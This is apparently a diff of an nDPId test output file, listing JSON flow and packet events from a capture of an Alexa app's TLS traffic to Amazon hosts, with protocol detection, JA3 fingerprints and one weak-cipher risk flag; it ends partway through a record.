-00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":618,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976047050,"flow_last_seen":1490976047050,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976047050,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34034,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":618,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1490976047050,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976047050,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8zEVAAEAGR+WsECrYNu8YuoTyAbvILJz0AAAAAKAC\/\/\/j9wAAAgQFtAQCCAoA9lCxAAAAAAEDAwg="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":620,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1490976047071,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976047071,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwYANAAOcGDTM27xi6rBAq2AG7hPHQ2dGWKLR0gXASH\/53JwAAAgQFtAEDAwY="} 
-00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":621,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1490976047073,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976047073,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoJC5AAEAG8BCsECrYNu8YuoTxAbsotHSB0NnRl1AQAVfBmAAA"} -00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":622,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047014,"flow_last_seen":1490976047075,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976047075,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34033,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":623,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976047096,"flow_last_seen":1490976047096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976047096,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45683,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":623,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1490976047096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976047096,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8Q4ZAAEAGA2msECrYNF7ohrJzAbuRhBMzAAAAAKAC\/\/+poAAAAgQFtAQCCAoA9lC1AAAAAAEDAwg="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":624,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1490976047107,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976047107,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwYitAAOcGCws27xi6rBAq2AG7hPIGkxHQyCyc9XASH\/45RwAAAgQFtAEDAwY="} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":625,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1490976047109,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976047109,"pkt":"AMDKkaPvePiC0\/vCCABFAAAozEZAAEAGR\/isECrYNu8YuoTyAbvILJz1BpMR0VAQAVeDuAAA"} -00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":626,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047050,"flow_last_seen":1490976047111,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976047111,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34034,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":632,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976047014,"flow_last_seen":1490976047133,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976047133,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34033,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":636,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1490976047154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976047154,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwRp1AAOcGWV00XuiGrBAq2AG7snPq5wFokYQTNHASH\/4rBwAAAgQFtAEDAwY="} 
-00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":637,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1490976047155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976047155,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoQ4dAAEAGA3ysECrYNF7ohrJzAbuRhBM06ucBaVAQAVd1eAAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":638,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047096,"flow_last_seen":1490976047156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976047156,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45683,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":641,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976047050,"flow_last_seen":1490976047169,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976047169,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34034,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":645,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976047096,"flow_last_seen":1490976047217,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976047217,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45683,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":679,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976047560,"flow_last_seen":1490976047560,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976047560,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54427,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":679,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1490976047560,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976047560,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8csJAAEAG6uOsECrYNFXR2NSbAbtgrSImAAAAAKAC\/\/+\/5AAAAgQFtAQCCAoA9lDkAAAAAAEDAwg="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":680,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976047563,"flow_last_seen":1490976047563,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976047563,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42143,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":680,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1490976047563,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976047563,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8y+FAAEAGgVWsECrYSBXOh6SfAbuD+JsFAAAAAKAC\/\/9DRwAAAgQFtAQCCAoA9lDkAAAAAAEDAwg="} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":683,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1490976047602,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976047602,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqqU0VdHYrBAq2AG71JuiSVznYK0iJ6AScSA47wAAAgQFtAQCCAptkKkCAPZQ5AEDAwg="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":684,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":1490976047603,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976047603,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0csNAAEAG6uqsECrYNFXR2NSbAbtgrSInoklc6IAQAVfXgQAAAQEICgD2UOhtkKkC"} -00853{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":685,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047560,"flow_last_seen":1490976047610,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1490976047610,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54427,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"5ee142340adf02ded757447e2ff78986","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
-00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":687,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1490976047629,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976047629,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwJsxAAOcGf3ZIFc6HrBAq2AG7pJ+6tUVgg\/ibBnASH\/6xFgAAAgQFtAEDAwY="} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":688,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1490976047631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976047631,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoy+JAAEAGgWisECrYSBXOh6SfAbuD+JsGurVFYVAQAVf7hwAA"} -00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":689,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047563,"flow_last_seen":1490976047631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976047631,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42143,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
-00907{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":693,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976047560,"flow_last_seen":1490976047664,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":673,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1490976047664,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54427,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"5ee142340adf02ded757447e2ff78986","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":704,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976047563,"flow_last_seen":1490976047695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976047695,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42143,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
-00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":719,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976047858,"flow_last_seen":1490976047858,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976047858,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42144,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":719,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1490976047858,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976047858,"pkt":"AMDKkaPvePiC0\/vCCABFAAA84nJAAEAGasSsECrYSBXOh6SgAbtFc7NzAAAAAKAC\/\/9pQAAAAgQFtAQCCAoA9lEBAAAAAAEDAwg="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":721,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1490976047907,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976047907,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwsPFAAOcG9VBIFc6HrBAq2AG7pKCmhnFJRXOzdHASH\/6\/cgAAAgQFtAEDAwY="} 
-00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":722,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1490976047908,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976047908,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo4nNAAEAGatesECrYSBXOh6SgAbtFc7N0poZxSlAQAVcJ5AAA"} -00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":723,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047858,"flow_last_seen":1490976047908,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976047908,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42144,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":726,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976047858,"flow_last_seen":1490976047956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976047956,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42144,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":398,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976043814,"flow_last_seen":1490976043814,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976043814,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42129,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":398,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1490976043814,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976043814,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8JoxAAEAGJqusECrYSBXOh6SRAbtDcGnhAAAAAKAC\/\/+2eAAAAgQFtAQCCAoA9k9tAAAAAAEDAwg="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":399,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976043814,"flow_last_seen":1490976043814,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976043814,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42130,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":399,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1490976043814,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976043814,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8bx1AAEAG3hmsECrYSBXOh6SSAbsCViBwAAAAAKAC\/\/9BAwAAAgQFtAQCCAoA9k9tAAAAAAEDAwg="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":400,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1490976043869,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976043869,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwnhhAAOcGCCpIFc6HrBAq2AG7pJISbmyuAlYgcXASH\/4uVQAAAgQFtAEDAwY="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":401,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1490976043870,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976043870,"pkt":"AMDKkaPvePiC0\/vCCABFAAAobx5AAEAG3iysECrYSBXOh6SSAbsCViBxEm5sr1AQAVd4xgAA"} +00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":402,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976043814,"flow_last_seen":1490976043870,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976043870,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42130,"dst_port":443,"l4_proto":"tcp","ndpi": 
